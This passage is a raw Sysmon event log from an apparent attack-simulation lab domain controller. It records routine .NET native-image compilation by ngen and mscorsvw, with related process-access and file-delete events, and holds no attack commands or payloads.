23542300x800000000000000023410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.136{4DB9351A-A27E-60D3-AF05-00000000CF01}4480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\68RL3BVWE4\PresentationFramework.Classic.ni.dllMD5=8E25CC443371ABCDFF7D349B68D31584,SHA256=ACF5FE834F592D971C5FCA6A989C9CF6F47DB4A77C90D5B7E5562C02184AD9FC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.089{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-AF05-00000000CF01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.089{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DA09D769E1B8B6F9640C5F217085A28,SHA256=07C578ED3B2771261ADD7EC4E0736CFBD72E4E06186F07A5AED8FC11E7362A03,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000023407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.058{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-AF05-00000000CF01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.058{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-AF05-00000000CF01}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.058{4DB9351A-A27E-60D3-AE05-00000000CF01}3596NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1QNJULDUR5\PresentationFramework.AeroLite.ni.dll.auxMD5=670E69144108250A7E3475FB92CE3676,SHA256=44C6074B56D315558125E598C88AAD7F3CF148F929618F6F6D84DF33E30BEE09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.058{4DB9351A-A27E-60D3-AE05-00000000CF01}3596NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1QNJULDUR5\PresentationFramework.AeroLite.ni.dllMD5=8E4D9163419F82820922D574536CF84A,SHA256=873AA6A9949CEE27AB3C31453E145811F775ECA7618F567DBB3BE4ECA1AC7EE7,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.042{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-AE05-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.027{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-AE05-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.027{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-AE05-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.011{4DB9351A-A27D-60D3-AD05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\E5XRBD8STM\PresentationFramework.Aero.ni.dll.auxMD5=398B5E1FECE5B43CEEEA752E083BAFD6,SHA256=4DC5B07C3DCE394E698A8379A5FFAF247845F4D868D3047D333E32D55406CAA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.011{4DB9351A-A27D-60D3-AD05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\E5XRBD8STM\PresentationFramework.Aero.ni.dllMD5=05E2EA65D124A8534A8041EC5E5BE035,SHA256=F0733782822A10F4C227AE66C9F099E5877972D6C82B65263D9CC1C434EFEA3C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.996{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-AD05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27F-60D3-BB05-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.686{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27F-60D3-BB05-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:11.686{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27F-60D3-BB05-00000000CF01}5160C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.686{4DB9351A-A27F-60D3-BA05-00000000CF01}5476NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RXHUSAOTHD\System.Activities.DurableInstancing.ni.dll.auxMD5=0B5CA90882AC7CCCAE7B06D6FEB49D3E,SHA256=05761CE9827BEF33452CF10F38AD1433E8F6061672AF40949D0B3BB282567881,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.686{4DB9351A-A27F-60D3-BA05-00000000CF01}5476NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RXHUSAOTHD\System.Activities.DurableInstancing.ni.dllMD5=7A5E72329A65193A9D84A77E2524E09B,SHA256=DAA524631E92431901828CC76F40CC719855B548288997777080143EF8AD412E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.670{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27F-60D3-BA05-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.655{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27F-60D3-BA05-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:11.655{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27F-60D3-BA05-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.639{4DB9351A-A27F-60D3-B905-00000000CF01}5844NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CB6UMV4BRY\System.Activities.Core.Presentation.ni.dll.auxMD5=5BB415D2811BC7CBE29D778C7F477337,SHA256=60E99F952942738B901D5816C39F96094DB78D19C39FEFC5B566B6448213D411,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.639{4DB9351A-A27F-60D3-B905-00000000CF01}5844NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CB6UMV4BRY\System.Activities.Core.Presentation.ni.dllMD5=FF3D6C89D4C8880F2D527D7C6103AE19,SHA256=39BF5BE8F6BF48259D7E2316185A8C08F666F3921E0F7FC61D648A32140B18E3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.530{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29E7B637ED1D1FDB5D796B971BD2EA70,SHA256=05B843C78DC7B8A4CEAB0C35D1F9151D308E09A77BC83E16EE5024F55E4477A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.530{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CB57B526CA4D2CCC8F369ADF6656C1A,SHA256=71A583A6A8BC656CFC7A446A3A4924EB1E95AA5F84C58E5A9211DE9CA003ED24,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:11.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27F-60D3-B905-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.467{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27F-60D3-B905-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:11.467{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27F-60D3-B905-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.467{4DB9351A-A27F-60D3-B805-00000000CF01}3256NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9QAIJVRSAA\System.Activities.ni.dll.auxMD5=25B7A8847291214AA7EDA57DA7484C02,SHA256=C9C9011ADA19818E2F42AB129F28892F4F21E8D77DDA15C45E394CF3900BDD7F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.467{4DB9351A-A27F-60D3-B805-00000000CF01}3256NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9QAIJVRSAA\System.Activities.ni.dllMD5=711B3E8DE0A6701457B428B1794C9117,SHA256=71AE2094C2B4D81B69066D34D897D287921A4268E0A5E01EF0C35A3D7845EB25,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ec